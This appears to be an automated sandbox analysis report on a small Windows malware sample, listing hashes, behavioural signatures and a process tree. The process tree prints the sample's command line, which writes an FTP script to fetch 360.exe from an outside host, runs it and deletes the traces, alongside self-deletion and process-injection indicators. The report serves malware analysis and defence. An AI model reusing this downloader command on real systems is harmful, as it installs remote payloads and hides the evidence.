Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
09/10/2024, 06:56
Static task
static1
Behavioral task
behavioral1
Sample
2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe
-
Size
44KB
-
MD5
2cd18332e818c2273ba978198081cd77
-
SHA1
253ffeb16bf88ff1590e87f438ceb5bade306ffb
-
SHA256
045419ee981cea824228b99d0e1682bf443752cd22f7b09d3b5e5ea9a49b958d
-
SHA512
4f3177a01daa9e34e2d1ab1119bcd7a653f820fd73890f5cbcd715016460cd0a2b7468c375833bb615a9e3641c053e9bd0ef5890828ac586d1c0ff7f4f00a839
-
SSDEEP
768:xCmnG5OxBdbHk8yw6SYx27CbuwayDh5aeRghbo7te5MpGM9SD8qlG5jpYgXShIHV:kmGg9HjWJoeBayDkRace
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 1216 cmd.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ftp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main 2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2844 2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe 2844 2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe 2844 2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2844 wrote to memory of 2888 2844 2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe 31 PID 2844 wrote to memory of 2888 2844 2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe 31 PID 2844 wrote to memory of 2888 2844 2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe 31 PID 2844 wrote to memory of 2888 2844 2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe 31 PID 2888 wrote to memory of 2828 2888 Cmd.exe 33 PID 2888 wrote to memory of 2828 2888 Cmd.exe 33 PID 2888 wrote to memory of 2828 2888 Cmd.exe 33 PID 2888 wrote to memory of 2828 2888 Cmd.exe 33 PID 2844 wrote to memory of 1216 2844 2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe 36 PID 2844 wrote to memory of 1216 2844 2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe 36 PID 2844 wrote to memory of 1216 2844 2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe 36 PID 2844 wrote to memory of 1216 2844 2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\SysWOW64\Cmd.exeCmd /c echo open laot.3322.org>>ftpdate.sys&echo ccc>>ftpdate.sys&echo 123>>ftpdate.sys&echo bin>>ftpdate.sys&echo get 360.exe %windir%\system32\Microsoft\360.exe>>ftpdate.sys&echo bye>>ftpdate.sys&ftp -s:ftpdate.sys&del ftpdate.sys&%windir%\system32\Microsoft\360.exe&Del %windir%\system32\Microsoft\360.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\SysWOW64\ftp.exeftp -s:ftpdate.sys3⤵
- System Location Discovery: System Language Discovery
PID:2828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Sc.bat""2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:1216
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
210B
MD5b7fa4d1a0b27634c935c52e13c6eff97
SHA1a20a7027dcb1db2269f153308183ed6bf9870777
SHA256cf6bac03f02036269dc90bf90af84aaf6759b7bf1991359eff7178b997db1049
SHA5124ab4e6ab8b8a609cbf9a6ce3effe8e7bf5e6b9d790c81c144704b9dc94aa6e486b4acc336ba9b4c33f4f5e430b15256bd91a38f807a33b051b46886e8a9b9563
-
Filesize
91B
MD5842e6460bf164918765c229eb25a4b2a
SHA18d153a8d2c5334424a83b34a81fd9c329c3c5d38
SHA2561039a3a5428926a53028775c042864d0441634ba498288d7e61bd3f3e71fec53
SHA5124914fb4ad5b950721d4c69c75e74d9e6979219089a9bf991bddd79e3b704799cf4582c03b0ae84cfd2010f57eea1370a0121fd1c2b4b5af9ea88966a145a6725